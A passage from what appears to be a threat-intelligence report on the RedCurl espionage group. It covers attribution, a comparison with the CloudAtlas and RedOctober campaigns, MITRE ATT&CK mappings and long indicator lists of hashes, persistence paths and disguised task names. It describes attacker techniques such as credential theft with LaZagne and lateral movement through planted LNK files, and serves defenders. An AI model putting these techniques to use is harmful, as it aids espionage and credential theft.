network drives that have write access\r\n\r\nAttribution\r\nRedCurl’s focus on espionage and the use of public cloud services may indicate that its campaigns are a continuation of the RedOctober and CloudAtlas campaigns described by Kaspersky Lab in the past (https://securelist.ru/cloud-atlas-stilnoe-vozvrashhenie-art-kampanii/24716/, 
https://securelist.com/recent-cloud-atlas-activity/92016/). These cyberespionage attacks targeted industrial, governmental, and commercial organizations in Russia, Central Asia, and Ukraine. They were carried out between 2010 and 2019. At the time of writing, there is no information about attacks involving CloudAtlas tools in 2020.\r\nRedCurl, discovered by Group-IB experts, carried out attacks at different intervals between 2018 and 2020 inclusive. The earliest attack dates back to May 2018. Its victims included companies based in the UK, Canada, Norway, Germany, Russia, and Ukraine. All the companies were private and commercial.\r\nAs such, based on the geographical scope of the attacks, it is impossible to confirm any links with the campaigns described by Kaspersky Lab.\r\nAnalysis of RedCurl revealed that one of the SFX archives was created using the WinRAR utility set to Russian. This fact is confirmed by the strings in the resources section. Moreover, Russian was set in one of the profiles used as a C\u0026C server.\r\nFigure 16. Language in the cloud web interface\r\nFigure 17. 
SFX archive resources\r\n\r\nRedCurl, CloudAtlas and RedOctober: campaign comparison\r\nAspect | RedCurl | CloudAtlas | RedOctober\r\nInitial access | SFX archives, LNK files, XLAM documents, JS files | Phishing document containing the following exploits: CVE-2017-11882, CVE-2018-0802 | Phishing document containing the following exploits: CVE-2009-3129, CVE-2010-3333, CVE-2012-0158\r\nCommand (all three campaigns) | Obtains information about the infected machine; exfiltrates data; obtains a directory listing; propagates across the compromised network\r\nCommand | Sets up access to the compromised machine via SSH; creates a phishing window with a form for entering domain account credentials | — | Keylogger; takes screenshots; exfiltrates data from mobile devices\r\nCommand (RedCurl and CloudAtlas) | Extracts passwords using the LaZagne tool | RedOctober: —\r\nC\u0026C communication protocol (all three campaigns) | WebDAV\r\nLateral movement | Substitutes original documents on a network drive with LNK files | — | Scans network computers for the MS08-067 vulnerability\r\nOpen-source tools used (RedCurl and CloudAtlas) | LaZagne, 7-Zip | RedOctober: —\r\nOpen-source tools used | ADExplorer, NirCmd, SSH, curl | — | —\r\nThe RedOctober, CloudAtlas, and RedCurl campaigns all involved a modular Trojan. The C\u0026C servers sent commands in separate modules. The RedOctober campaigns and early CloudAtlas attacks used the WebDAV protocol to communicate with operators, just like the RedCurl campaign. However, the tools used in RedCurl attacks are unprecedented and written in PowerShell. The latest CloudAtlas attacks also used a new PowerShell tool, which Group-IB classified as PowerShower. Analyzing this tool did not reveal overlaps in the code with any RedCurl tools. LaZagne was used to retrieve passwords as part of all the campaigns. 
A detailed comparison between the campaigns based on the MITRE ATT\u0026CK® matrix is presented below.\r\n\r\nMITRE ATT\u0026CK® Mapping (RedCurl)\r\nTactic | Technique | Procedure\r\nTA0001: Initial Access | T1566.002: Spearphishing Link | The cybercriminals used phishing emails with links to SFX archives to gain initial access to the target host.\r\nTA0002: Execution | T1204.002: Malicious File | The victim must launch an executable file and open an LNK, XLAM, MHT or JS file for the infection to start.\r\nTA0002: Execution | T1059.003: Windows Command Shell | The cybercriminals used cmd.exe to execute batch scripts.\r\nTA0002: Execution | T1059.001: PowerShell | The cybercriminals used PowerShell scripts to perform post-exploitation tasks.\r\nTA0002: Execution | T1059.005: Visual Basic | The cybercriminals used VBScript to run batch files.\r\nTA0003: Persistence | T1053.005: Scheduled Task | The cybercriminals created tasks in the scheduler to achieve persistence on compromised systems.\r\nTA0003: Persistence | T1547.001: Registry Run Keys / Startup Folder | The cybercriminals created entries in the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key to achieve persistence on compromised systems.\r\nTA0005: Defense Evasion | T1027: Obfuscated Files or Information | The cybercriminals encrypted data and Base64-encoded PowerShell commands.\r\nTA0005: Defense Evasion | T1036.005: Match Legitimate Name or Location | The cybercriminals masked their scripts and scheduled tasks using names similar to legitimate ones.\r\nTA0005: Defense Evasion | T1070.004: File Deletion | The cybercriminals removed batch scripts immediately after execution.\r\nTA0005: Defense Evasion | T1564.001: Hidden Files and Directories | The cybercriminals added the “hidden” attribute to malicious libraries and to the files that malicious LNK files pointed to.\r\nTA0005: Defense Evasion | T1218.011: Rundll32 | The cybercriminals used rundll32.exe to launch RedCurl.Dropper.\r\nTA0006: 
Credential Access | T1003.001: LSASS Memory | The cybercriminals used LaZagne to extract passwords from volatile memory.\r\nTA0006: Credential Access | T1555.003: Credentials from Web Browsers | The cybercriminals used LaZagne to extract passwords stored by web browsers.\r\nTA0006: Credential Access | T1552.001: Credentials in Files | The cybercriminals used LaZagne to extract passwords stored in files.\r\nTA0006: Credential Access | T1552.002: Credentials in Registry | The cybercriminals used LaZagne to extract passwords stored in the registry.\r\nTA0006: Credential Access | T1056.002: GUI Input Capture | The cybercriminals used a phishing Microsoft Outlook pop-up to intercept login credentials.\r\nTA0007: Discovery | T1082: System Information Discovery | The cybercriminals regularly collected information about compromised systems.\r\nTA0007: Discovery | T1035: Network Share Discovery | The cybercriminals collected information about network drives available to compromised hosts.\r\nTA0007: Discovery | T1083: File and Directory Discovery | The cybercriminals collected information about files on local and network drives.\r\nTA0007: Discovery | T1087.001: Local Account | The cybercriminals collected information about local accounts.\r\nTA0007: Discovery | T1087.002: Domain Account | The cybercriminals collected information about domain accounts.\r\nTA0007: Discovery | T1087.003: Email Account | The cybercriminals collected information about email accounts.\r\nTA0008: Lateral Movement | T1080: Taint Shared Content | The cybercriminals placed modified LNK files on network drives, which allowed them to propagate across the network.\r\nTA0009: Collection | T1119: Automated Collection | The cybercriminals used batch scripts to collect data.\r\nTA0009: Collection | T1005: Data from Local System | The cybercriminals collected data from the local disks of compromised systems.\r\nTA0009: Collection | T1039: Data from Network Shared Drive | The cybercriminals collected data from network drives.\r\nTA0009: Collection | T1114.001: Local 
Email Collection | The cybercriminals collected emails.\r\nTA0011: Command and Control | T1102: Web Service | The cybercriminals used legitimate web services to download malicious batch scripts.\r\nTA0011: Command and Control | T1071.001: Web Protocols | The cybercriminals used the HTTP, HTTPS, and WebDAV protocols to perform network connections.\r\nTA0010: Exfiltration | T1020: Automated Exfiltration | The cybercriminals used batch scripts to exfiltrate data.\r\nTA0010: Exfiltration | T1537: Transfer Data to Cloud Account | The cybercriminals used cloud storage services to copy data.\r\n\r\nMITRE ATT\u0026CK® Mapping (RedOctober/Cloud Atlas/Inception)\r\nTactic | Technique | Procedure\r\nTA0001: Initial Access | T1566.001: Spearphishing Attachment | The cybercriminals used phishing emails with malicious attachments to gain initial access.\r\nTA0002: Execution | T1204.002: Malicious File | The device becomes infected as soon as the victim opens the malicious document.\r\nTA0002: Execution | T1059.001: PowerShell | The cybercriminals used PowerShell scripts during post-exploitation tasks.\r\nTA0002: Execution | T1059.005: Visual Basic | The cybercriminals used a VBScript to run batch files.\r\nTA0002: Execution | T1203: Exploitation for Client Execution | The cybercriminals exploited the CVE-2012-0158, CVE-2014-1761, CVE-2017-11882, and CVE-2018-0802 vulnerabilities to execute malicious code.\r\nTA0003: Persistence | T1547.001: Registry Run Keys / Startup Folder | The cybercriminals created entries in the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key to ensure persistence on compromised systems.\r\nTA0005: Defense Evasion | T1027: Obfuscated Files or Information | The cybercriminals used the AES and RC4 algorithms to encrypt the payload.\r\nTA0005: Defense Evasion | T1218.010: Regsvr32 | The cybercriminals used regsvr32.exe to launch malicious DLLs.\r\nTA0005: Defense Evasion | T1218.005: Mshta | The cybercriminals used malicious HTA files to download and execute 
malicious code.\r\nTA0005: Defense Evasion | T1221: Template Injection | The cybercriminals used malicious documents to download the payload from a remote server over HTTP.\r\nTA0006: Credential Access | T1003.001: LSASS Memory | The cybercriminals used LaZagne to extract passwords from volatile memory.\r\nTA0006: Credential Access | T1555.003: Credentials from Web Browsers | The cybercriminals used LaZagne to extract passwords stored by web browsers.\r\nTA0006: Credential Access | T1552.001: Credentials in Files | The cybercriminals used LaZagne to extract passwords stored in files.\r\nTA0006: Credential Access | T1552.002: Credentials in Registry | The cybercriminals used LaZagne to extract passwords stored in the registry.\r\nTA0007: Discovery | T1082: System Information Discovery | The cybercriminals regularly collected information about compromised systems.\r\nTA0007: Discovery | T1083: File and Directory Discovery | The cybercriminals collected information about files stored on local and network drives.\r\nTA0007: Discovery | T1087.001: Local Account | The cybercriminals collected information about local accounts.\r\nTA0007: Discovery | T1087.002: Domain Account | The cybercriminals collected information about domain accounts.\r\nTA0007: Discovery | T1518: Software Discovery | The cybercriminals collected information about the software installed on the compromised hosts.\r\nTA0009: Collection | T1119: Automated Collection | The cybercriminals used batch scripts to collect data.\r\nTA0009: Collection | T1005: Data from Local System | The cybercriminals collected data from the local disks of the compromised systems.\r\nTA0009: Collection | T1039: Data from Network Shared Drive | The cybercriminals collected data from network drives.\r\nTA0011: Command and Control | T1102: Web Service | The cybercriminals used legitimate web services to download malicious batch scripts.\r\nTA0011: Command and Control | T1071.001: Web Protocols | The cybercriminals used the HTTP, HTTPS, and WebDAV protocols to perform network 
connections.\r\nTA0011: Command and Control | T1573.001: Symmetric Cryptography | The cybercriminals used the AES algorithm to encrypt network connections.\r\nTA0011: Command and Control | T1090.003: Multi-hop Proxy | The cybercriminals used chains of compromised routers to communicate with cloud storage providers.\r\nTA0010: Exfiltration | T1020: Automated Exfiltration | The cybercriminals used batch scripts to exfiltrate data.\r\nTA0010: Exfiltration | T1537: Transfer Data to Cloud Account | The cybercriminals used cloud storage services to copy data.\r\nThe above comparative analysis of the RedCurl, CloudAtlas, and RedOctober campaigns shows that, despite similarities between the attacks, it is impossible to assert unequivocally whether RedCurl is a continuation of the CloudAtlas and RedOctober campaigns or linked to them in any way.\r\n\r\nIoCs\r\nSamples\r\nDate Hashes Classification\r\n
5e694e86bf0bc3e55f5a65d6684e1631\r\nSHA1: c47522b3923173881f52dddacd48acd88359f23a\r\nSHA256: ffc76831a7c5279ea1465f8f5f01a249052721a6618c8dc1ba68f3ea3d06\r\n2cce\r\nRedCurl.Dropper\r\nMD5: 2a5365dc4344c258196dfdba5d783db0\r\nSHA1: 0782da50a5ddf8551adc5957896a0406abc8ad16\r\nSHA256: d90d3d5c18bb8b9ba31be1a82fdbc7df4d37e7d05873e18843229\r\ne27b0501991\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: 2d484bd4ea9e4d3853f0e91e062d980b\r\nSHA1: a31317e167c445fc09a2fb04a8eff66f038f921f\r\nSHA256: 7c99c0a7882da8d88c175ce4a34d2cac80bcdb7a2fa5f3815b0188554\r\n6b9e205\r\nEncrypted\r\nRedCurl.C1\n\n44\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Hashes Classification\r\n2020-02-20 MD5: a1fa93c9650044ed71bbda18bdfe5f61\r\nSHA1: 19fd1b5c9d7f3f2ff9bad94381a2a4c19247dfd3\r\nSHA256: e5feb61cadf77531c1d424ea780deb54b802791bbd7bec640989468ff7f\r\n598af\r\nEncrypted\r\nRedCurl.C2\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: c47104f9c669454e7b48d2c717d949da\r\nSHA1: edfc60a54fda49fa43a6e0d8ed5a14e181278617\r\nSHA256: 5bfb89aa7b1014a239733f04c5c93d8ff3835d68c9ed12cd87e5a2f700\r\nc2ad43\r\nRedCurl.Dropper\r\nMD5: 808f2e36caaa5c2e88c29cf0e634e2bb\r\nSHA1: 84051063cf4e11cef9ec8c3ce81d4a2a4b36348f\r\nSHA256: 0313e9c6db0d200fc52cf45444d7f0b4e2415091a09f11c77d93ff0ca5f\r\n466c5\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: 1c3a60db0b174963dd01953c55804411\r\nSHA1: ccc8176dd2cc0d7831d153f9d9399b4712e6da5b\r\nSHA256: 03ffd05b057f837ca6a110ad6ee3c3abaf240e4b28ba6a161dad824dfe\r\n9f86aa\r\nEncrypted\r\nRedCurl.C1\r\nMD5: 04a1c0704b549581e3029634ea2ecf07\r\nSHA1: 6343000188465aa07d92639f812f7fccf0ed56cf\r\nSHA256: 95d95e0df11486a4ac675dadad541848435327a1f9eed331bba808179\r\n821d740\r\nEncrypted\r\nRedCurl.C2\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 47db515e537b88184f450bd352cb7e6e\r\nSHA1: d9d6001515073a6fda28958f5990091733662e17\r\nSHA256: 
4cff712afedaf492ffc01c1d96d0ec3fa08e7a361787fd97971313a8d20\r\n1ebe1\r\nRedCurl.Dropper\r\nMD5: 65693ff4d81af47db2974ade7db857e0\r\nSHA1: 2dd90d341d80edef4fbee339c856caec3001056f\r\nSHA256: e29ccda7507adc5479d4413c9486b2217b4c2e415be5f03259540359\r\nd7b2c6aa\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: 24b5427d7e147de61d6b2b535aa1028f\r\nSHA1: ff054cc435c8007f3238bee5ab40b95675ee8208\r\nSHA256: cfabe2d5bee9367fd7a8a6882c3ab0fbd897520e44ce67cc40d60b02\r\nf8f19d04\r\nEncrypted\r\nRedCurl.C1\r\nMD5: a3d0c95a34ebf46b313c26ea7ca79288\r\nSHA1: 7bef4606d73bd77b8d1d5b6b7a08f8869190d49d\r\nSHA256: f66c8d0fdc5d436a5c284d36d36cfe3cc7e1f7efcca5a7274a58bf1cd5f\r\nfd4b8\r\nEncrypted\r\nRedCurl.C2\n\n45\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Hashes Classification\r\n2020-01-21 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 95a5fba13ae88e43f460c9fba7328670\r\nSHA1: 47dc335be7c9c114c6061fd72b8b76cf87e63e72\r\nSHA256: 10558d1be5fcaf108240ebe1f8a53ecb0c4acc82e7f3ab6885b00dc102\r\n9b7fcf\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: 4fff5bd6c746139406279f764504cd9c\r\nSHA1: 2f7581666f5a7ccc6afa3a1ac7cc1994f78a7ae2\r\nSHA256: 4f984cf3589903887f0b221b1db5ef7c47e7bce9568a5a8070aea8f42f\r\nb31fe9\r\nEncrypted\r\nRedCurl.C1\r\nMD5: d3de39a4482cfa3f051f418a10e1994e\r\nSHA1: 91210c365e4ceaaef5aeb595f30c53d573a27943\r\nSHA256: d4a7943abb06b42b731c22bb8fd5c49fb714dcac11cbeca1e81c5781f62\r\nff5b6\r\nEncrypted\r\nRedCurl.C2\r\n2020-03-25 MD5: 082f4383801b79279e82b718c672a452\r\nSHA1: ce178c77370e9654c810c5a67fa55d2e0bd0a7f4\r\nSHA256: 24b6308438b081c77338a917b907d57a3f5519b6008167e6c1b3d9d02\r\ncd4a38a\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: a75871000b944b87fa0aee37cb20facf\r\nSHA1: c25194f9c547a85a9ce7a7dd752427b33a16c0e7\r\nSHA256: 15417751a35972f2e54123e97440a8acf24c26bbd9d8521cc88fb7498\r\nb54b567\r\nEncrypted\r\nRedCurl.C1\r\nMD5: 
e000ab9fa0bf5e01ba353bba14fac8f1\r\nSHA1: 51d60a7da40c11e37b31462e6b78f909e84d85f4\r\nSHA256: 22d9328d4e9da55db54576ab52eb6837c20bf034e045e5f078b00e7\r\n7c362aeff\r\nEncrypted\r\nRedCurl.C2\r\n2020-07-06 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 12ec7e6876dc86f158f448ebfba9e0eb\r\nSHA1: 464a8c086279357ad41e15180ae0d4881cf48717\r\nSHA256: 5388a22c42c360937e422df0f4336c48003fbf72aa87bb1f4107de900\r\n59dc04d\r\nRedCurl.Dropper\n\n46\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Hashes Classification\r\n2020-07-06 MD5: 65167ef2ac035b8205e657a31b3c8ee5\r\nSHA1: aa21dc970461c653bd24e75a1440f6893bbaf747\r\nSHA256: df621643336947405b6f0d66927730a51267c39b6978ac732f9dc7941\r\n7fba464\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: cda007d68777e193827ab87cb00c4726\r\nSHA1: 25a3d8aacc4bb40fd3a42ab7fa80c180324ac90b\r\nSHA256: 7476fe7f7750f5fcc2eeb66b3626377957f0a1e92d621cb4db2352b659\r\n5722c7\r\nEncrypted\r\nRedCurl.C1\r\nMD5: 12ec7e6876dc86f158f448ebfba9e0eb\r\nSHA1: 464a8c086279357ad41e15180ae0d4881cf48717\r\nSHA256: 5388a22c42c360937e422df0f4336c48003fbf72aa87bb1f4107de900\r\n59dc04d\r\nEncrypted\r\nRedCurl.C2\r\n2020-07-10 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 1a0b622c4f2805b601655f7ffe0dabf6\r\nSHA1: 8fc49c58aeb70943da579e6985b64d78a56f6958\r\nSHA256: 61f981e15bae9b0643262f16a124cb490f51d0040267d41e17c6b83f2b9\r\nd437c\r\nRedCurl.Dropper\r\nMD5: 4071bf66e07cd4a7feadd316f91cfd56\r\nSHA1: b9c762e7e65b4cdcac054fa424b2219f8ecf3b78\r\nSHA256: edfa39f931ec45f71a4b6cc6b473f046a384f1f05637a1eb0a5a4c1608c\r\n044cf\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: db602ed8ba5890f162dc3546847646b1\r\nSHA1: 7fee558c6d6668e67e75dd94a2d7609c287ec756\r\nSHA256: 
7bdd5815e2fbe8ff71897dc0f56a980d9931731f4bcc45ea7782545debb\r\n556d7\r\nEncrypted\r\nRedCurl.C1\r\nMD5: f04cf464ddd719dce94640cc4b6e866d\r\nSHA1: 19d0afc92e3e98e3ed5e1db9aed21da791245e8d\r\nSHA256: 660f8efbf3f5e408092ead5933bcb80bd220d91d3233ec162ebf725fd\r\n0bc82f6\r\nEncrypted\r\nRedCurl.C2\r\n2020-07-14 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\n2020-07-14 MD5: 979eaebd1510996ab834e3471fdaab5b\r\nSHA1: 23e813e43dc67b50a7d00f76223c1fc56fe1abbe\r\nSHA256: bba4e8a3f2a05d5bb543b765c7964e33ba02e8a895bfc64976f6ae9\r\n412a99464\r\nRedCurl.Dropper\n\n47\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Hashes Classification\r\nMD5: 040cb066f2cdfc579c9be86128ceb8ff\r\nSHA1: b1a79cce4a75e46830f52fedc67b2a3209eb78bb\r\nSHA256: 016b42c3f7f1c3bffbec2228994ca36397f5e0f5c26132c297bae7e5dd7\r\n87da4\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: b5d0f72dc1bda1727d88c51cf16ee8c1\r\nSHA1: 729c83d7986eca76536e3b318233945a7febaff8\r\nSHA256: cf2b96927b6f3bf3bb169200e047b6337a256012f350b6f5b5b8bec37\r\n100f951\r\nEncrypted\r\nRedCurl.C1\r\nMD5: 662493e155284d654d61e2923efeeec4\r\nSHA1: 09bd864389edcc7585a42950e32619c31b1ac34a\r\nSHA256: 2c69410c0d45561d286b67f7848811b551dd659d62fef7cb1711875d3c1c\r\n0a3a\r\nEncrypted\r\nRedCurl.C2\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nPath\r\nDate Path\r\n2018-06-11 / 2018-07-04 %LOCALAPPDATA%\\Microsoft\\Control\r\n%APPDATA%\\Microsoft\\Check\r\n%APPDATA%\\Firefox\\Update\r\n%LOCALAPPDATA%\\Microsoft\\Control\\tmp\\1\r\n%LOCALAPPDATA%\\Microsoft\\Control\\tmp\\2\r\n2018-07-18 %APPDATA%\\Microsoft\\Check\r\n%APPDATA%\\Firefox\\Update\r\n2018-12-01 %APPDATA%\\MSSched\\\r\n2019-07-02 %LOCALAPPDATA%\\Microsoft\\DiskDiagnosticSrv\r\n%APPDATA%\\gbtregmainsrva\r\n%APPDATA%\\Microsoft\\regdevpchk\r\n2019-07-10 
%LOCALAPPDATA%\\Microsoft\\NetworkStateChangeTask\r\n%APPDATA%\\PowerEfficiencyDiagnosticsF\r\n%APPDATA%\\Microsoft\\EduPrintProvf\r\n2019-07-18 %LOCALAPPDATA%\\Microsoft\\ControlLocalTimeSvc\r\n%APPDATA%\\RealtekNetDrvCheckHostA\r\n%APPDATA%\\Microsoft\\IntelWirelessHostB\n\n48\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Path\r\n2019-07-25 %LOCALAPPDATA%\\Microsoft\\CleanupTemporaryStates\r\n%APPDATA%\\ADRMSRightsPolicyTemplate\r\n%APPDATA%\\Microsoft\\VerifiedPublishersCertsStoreCheck\r\n2019-07-30 %LOCALAPPDATA%\\Microsoft\\WsSwapAssessmentTaskF\\\r\n%APPDATA%\\IndexerAutomaticMaintenanceF»\r\n%APPDATA%\\Microsoft\\EnableLicenseAcquisitionS\r\n2019-07-31 %LOCALAPPDATA%\\Microsoft\\msftavchecka\r\n%APPDATA%\\SystemSoundsServiceb\r\n%APPDATA%\\Microsoft\\HybridDriveCacheRebalancec\r\n2019-08-14 %LOCALAPPDATA%\\NetworkStateChangeTask\r\n%APPDATA%\\PowerEfficiencyDiagnosticsF\r\n%APPDATA%\\Microsoft\\EduPrintProvf\r\n2019-08-06 %LOCALAPPDATA%\\Microsoft\\CalibrationLoaderU\r\n%APPDATA%\\MsCtfMonitorFrameworkH\r\n%APPDATA%\\Microsoft\\QueueReportingErrorM\r\n2019-08-08 %LOCALAPPDATA%\\Microsoft\\CalibrationLoaderU\r\n%APPDATA%\\MsCtfMonitorFrameworkH\r\n%APPDATA%\\Microsoft\\QueueReportingErrorM\r\n2019-09-12 %LOCALAPPDATA%\\Microsoft\\PropertyDefinition\r\n%APPDATA%\\UsbCeipCons\r\n%APPDATA%\\Microsoft\\MDMMaintenenceProgram\r\n2019-09-23 %LOCALAPPDATA%\\Microsoft\\GeneralizeDrivers\r\n%APPDATA%\\WorkFolders\r\n%APPDATA%\\Microsoft\\PCMobilityManager\r\n2019-09-24 %LOCALAPPDATA%\\Microsoft\\\\DevicesSettings\r\n%APPDATA%\\CertServicesServer\r\n%APPDATA%\\Microsoft\\DDClient\r\n2019-10-15 %LOCALAPPDATA%\\Microsoft\\VerifyRecoveryWinRE\r\n%APPDATA%\\HPComp\r\n%APPDATA%\\Microsoft\\drwats64oauthb\r\n2019-10-18 %LOCALAPPDATA%\\Microsoft\\DiskDiagnosticData\r\n%APPDATA%\\AikCertEnrollTask\r\n%APPDATA%\\Microsoft\\DataIntegrity\r\n2019-11-27 
%LOCALAPPDATA%\\Microsoft\\MSSharepointProducts\r\n%APPDATA%\\Microsoft\\MSSMConf\r\n%APPDATA%\\CTXWorkflowStudio\r\n2019-12-20 %LOCALAPPDATA%\\Microsoft\\MemoryDiagnosticService\r\n%APPDATA%\\BitLockerMgr\r\n%APPDATA%\\Microsoft\\DiagSvcMgr\n\n49\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Path\r\n2020-02-20 %LOCALAPPDATA%\\Microsoft\\SvcRestartTaskNetworkSrv\r\n%APPDATA%\\Microsoft\\ResolutionHostc\r\n%APPDATA%\\UPnPHostConfServb\r\n%LOCALAPPDATA%\\Microsoft\\SetSyncSvc\r\n%APPDATA%\\MSEntmgmt\r\n%APPDATA%\\Microsoft\\PTI\r\n%LOCALAPPDATA%\\Microsoft\\SpaceManagerSrv\r\n%APPDATA%\\DiskDiagnosticData\r\n%APPDATA%Microsoft\\SoftwareProtectionService\r\n2020-01-21 %LOCALAPPDATA%\\Microsoft\\OrchestratorUpd\r\n%APPDATA%\\RegSVR\\\r\n%APPDATA%\\Microsoft\\MSCTFSvc\r\n2020-03-25 %LOCALAPPDATA%\\Microsoft\\WinActDiag\r\n%APPDATA%\\Microsoft\\EnterpriseManagement\\\r\n%APPDATA%\\ADRMSManagement\r\n2020-07-06 %LOCALAPPDATA%\\DeviceDirectoryC\r\n%APPDATA%\\AppxDepCltn\r\n%APPDATA%\\Microsoft\\CUAssist\r\n2020-07-10 %LOCALAPPDATA%\\DirectXUSR\r\n%APPDATA%\\Microsoft\\CloudExperience\r\n%APPDATA\\CertificateServ\r\n2020-07-14 %LOCALAPPDATA%\\servcomptm\r\n%APPDATA%\\Microsoft\\WindowsActionDialog\r\n%APPDATA%\\AppID\r\nTasks\r\nDate Task\r\n2018-06-11 / 2018-07-04 Microsoft Windows Check Updates Status\r\nCheckTN1\r\n2018-07-18 CheckU3\r\nCheckTN1\r\n2019-07-02 DiskDiagnosticResolverSrv\r\nDeviceDirectoryCltServ\\RegisterDeviceProtectionStateCheck\r\nBrokerInfraService\\BgTaskRegistrationMaintenanceSrv\r\n2019-07-10 NetworkStateChangeTaskProv\r\nPrintingProvEdu\\EduPrintProvTask\r\nPowerEfficiencyDiagnostics\\PowerEfficiencyDiagnosticsTask\r\n2019-07-18 ControlLocalTimeSvc\r\nINTELW\\IntelWirelessHost\r\nRealtekNetDrvCheck\\RealtekNetDrvCheckHost\n\n50\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Task\r\n2019-07-25 
CleanupTemporaryStateTask\r\nVerifiedPublishersCerts\\VerifiedPublishersCertsStoreCheck\r\nADRMSRightsPolicyTemplates\\ADRMSRightsPolicyTemplateSrv\r\n2019-07-30 WsSwapAssessmentTask\r\nLicenseAcquisitionService\\EnableLicenseAcquisitionTask\r\nIndexerAutomaticMaintenance\\IndexerAutomaticMaintenanceTask\r\n2019-07-31 SynaMonAppService\r\nCertStore\\VerifiedPublisherCertStoreCheckBkp\r\nOfficeSupport\\OfficeTelemetryAgentLogOnSrv\r\n2019-08-14 PowerEfficiencyDiagnostics\r\nNetworkStateChangeTaskProv\r\nPrintingProvEdu\\EduPrintProvTask\r\n2019-08-06 CalibrationLoaderTask\r\nErrorReportingFramework\\QueueReportingError\r\nTextServices\\MsCtfMonitorFramework\r\n2019-08-08 CalibrationLoaderTask\r\nQueueReportingError\r\nMsCtfMonitorFramework\r\n2019-09-12 PropertyDefinitionSync_ + Base64(%USERNAME%)\r\nMDMEnterpriseMgmt\\MDMMaintenence_ + Base64(%USERNAME%)\r\nCustomerExperienceImprovementProgram\\UsbCeipConsolidator_ + Base64(%USERNAME%)\r\n2019-09-23 SysprepGeneralizeDrivers_ + Base64(%USERNAME%)\r\nRas\\PCMobilityManager_ + Base64(%USERNAME%)\r\nWorkFolders\\WorkFoldersLogonSynchronization_ + Base64(%USERNAME%)\r\n2019-09-24 RegisterDeviceSettingsChange_ + Base64(%USERNAME%)\r\nDriveDirectoryClient\\LocateCommandUserSessionTask_ + Base64(%USERNAME%)\r\nCertificateServicesServer\\KeyPreGenerTask_ + Base64(%USERNAME%)\r\n2019-10-15 HPComputers\\WakeUpAndScanForUpdates_ + Base64(%USERNAME%)\r\nVerifyRecoveryWinRE_ + Base64(%USERNAME%)\r\nMSFTSysSoundsServices\\SysSoundsServices_ + Base64(%USERNAME%)\r\n2019-10-18 Microsoft-Windows-DiskDiagnosticDataCollector_ + Base64(%USERNAME%)\r\nCertificateServicesClient\\AikCertEnrollTask_ + Base64(%USERNAME%)\r\nDataIntegrityScan\\DataIntegrityScan_ + Base64(%USERNAME%)\r\n2019-11-27 MicrosoftSharePointProducts_ + Base64(%USERNAME%)\r\nMS-ShareMapConfiguration\\ComPartitionSets_ + Base64(%USERNAME%)\r\nCitrix\\WorkflowStudio_ + Base64(%USERNAME%)\r\n2019-12-20 ProcessMemoryDiagnosticEvents_ + Base64(%USERNAME%)\r\nScheduled_ + Base64(%USERNAME%)\r\nBitLockerMDMpolicyRefresh_ + Base64(%USERNAME%)\n\n51\r\n2020-02-20 SvcRestartTaskNetworkService\r\nWDIResHost\\ResolutionHostTask\r\nUPnPHostConfSRV\\UPnPHostConfService\r\nNetworkStateChangeTask_ + Base64(%USERNAME%)\r\nMDMMaintenenceTask_ + Base64(%USERNAME%)\r\nRegistration_ + Base64(%USERNAME%)\r\nSpaceManagerService_ + Base64(%USERNAME%)\r\nSoftwareProtectionPlatform\\SvcRestartTaskNetwork_ + Base64(%USERNAME%)\r\nDiskDiagnostic\\\\Microsoft-Windows-DiskDiagnosticDataCollector_ + Base64(%USERNAME%)\r\n2020-01-21 MusUx_UpdateInterval_ + Base64(%USERNAME%)\r\nMsCtfMonitor_ + Base64(%USERNAME%)\r\nRegIdleBackup_ + Base64(%USERNAME%)\r\n2020-03-25 WindowsActionDialog_ + Base64(%USERNAME%)\r\nRMSRightsPolicyTemplateManagement_ + Base64(%USERNAME%)\r\nMDMMaintenenceTask_ + Base64(%USERNAME%)\r\n2020-07-06 DeviceDirectoryClient\\RegisterDevicePolicyChange_ + Base64(%USERNAME%)\r\nCUAssistant\\CULauncher_ + Base64(%USERNAME%)\r\nAppxDeploymentClient\\Pre-staged_app_cleanup_ + Base64(%USERNAME%)\r\n2020-07-10 DirectX\\DirectXDatabaseUpdater_ + Base64(%USERNAME%)\r\nCloudExperienceHost\\CreateObjectTask_ + Base64(%USERNAME%)\r\nCertificateServicesClient\\UserTask-Roam_ + Base64(%USERNAME%)\r\n2020-07-14 Servicing\\StartComponentCleanup_ + 